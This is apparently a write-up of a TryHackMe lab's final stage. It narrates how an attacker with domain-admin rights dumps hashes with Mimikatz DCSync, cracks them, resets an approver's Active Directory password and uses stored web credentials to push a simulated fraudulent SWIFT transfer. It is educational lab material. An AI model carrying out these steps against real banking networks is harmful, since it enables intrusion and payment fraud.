Compromise of SWIFT and Payment Transfer
Last updated
Last updated
Now that we have full control of the domain as both Enterprise and Domain Admin, our next objective is to compromise the SWIFT system and execute a payment transfer.
Earlier in the challenge, we identified the Swift Bank application, which should be accessible at http://swift.bank.thereserve.loc.
As the rootdc user on the bankdc machine, we inspect all the groups present on the system to understand the organizational structure and permissions. This can help identify key roles and privileges within the bankdc domain
We have a group of Payment Approvers and Payment Capturers.
Since it's likely we'll need access to their workstations, we can attempt to crack some user NTLM hashes by dumping them with Mimikatz using the DCSYNC command.
We have successfully cracked the NTLM hash of the c.young user using hashcat, while the other hashes could not be cracked with rockyou.txt or our pre-generated wordlist.
Next, using the network path, we locate the user profile of c.young on the WORK2 machine.
While checking the folder's contents, we find a note for the capturer.
In a similar manner, we come across a note for a.holt, who is an approver, on the JMP machine.
This note suggests that the SWIFT bank web application credentials for a.holt are separate from their Active Directory credentials, indicating that the relevant credentials might be stored on the JMP machine.
Since the Active Directory password for this user is not useful (and hashcat was unable to crack it), we can simply reset the password through the Active Directory Users and Computers snap-in using the Reset Password option.
After resetting the password, we can then log into the JMP machine as the user a.holt using the newly assigned password.
Accessing the web application in the browser, we can observe that the credentials are stored within it.
We are now able to access the Dashboard as an Approver.
What we know so far:
Credentials for Capturer: C.Young
Credentials for Approver: A.Holt
We are now in a position to leverage these credentials to further advance through the challenge. By following the specific steps outlined within the e-citizen platform, we can systematically complete the necessary tasks and capture the remaining flags.
We can login to the web application as Capturer and Approver on the same machine.
Flag 17 requires us to make a transaction between two dummy accounts.
Flag 18 requires us to capture a dummy transaction as Capturer: C.Young
Flag 19 requires us to approve the dummy transaction captured by the Capturer as Approver: A.Holt
Flag 20 requires us to repeat the steps for Flag 18 & 19 for to complete the fradulent transaction made between the two dummy accounts for Flag 17.
NOTE: We are now able to obtain the following flags by following the instructions on the e-citizen platform:
Flag 17: Access to SWIFT Application
Flag 18: Access to SWIFT application as capturer
Flag 19: Access to SWIFT application as approver
Flag 20: Simulated fraudulent transfer made
As a result, we have successfully achieved full network compromise, having executed each goal and demonstrated the significant impact of this compromise.
By leveraging the acquired credentials, exploiting various vulnerabilities, and methodically traversing the network, we have shown how an attacker can gain control over critical systems, including both child and parent domains, as well as specialized applications such as SWIFT.
This thorough approach highlights the potential risks to an organization's infrastructure and the wide-reaching consequences of a successful cyber-attack
This has undoubtedly been one of the most rewarding and challenging labs I've completed on TryHackMe.
The experience has been incredibly educational, as it introduced me to several attack vectors that I had never previously had the opportunity to explore. Through this challenge, I’ve gained invaluable hands-on experience that has significantly expanded my knowledge and skills in the field of cybersecurity.
This network challenge also highlighted the dynamic nature of live environments, where the behavior of systems can change unexpectedly when multiple users are interacting with them.
At times, methods that initially worked would suddenly stop functioning, forcing us to quickly adapt and find alternative solutions. This added an extra layer of complexity to the challenge, simulating real-world conditions where we need to remain flexible and resourceful in response to unforeseen issues. It was a valuable lesson in troubleshooting and resilience.
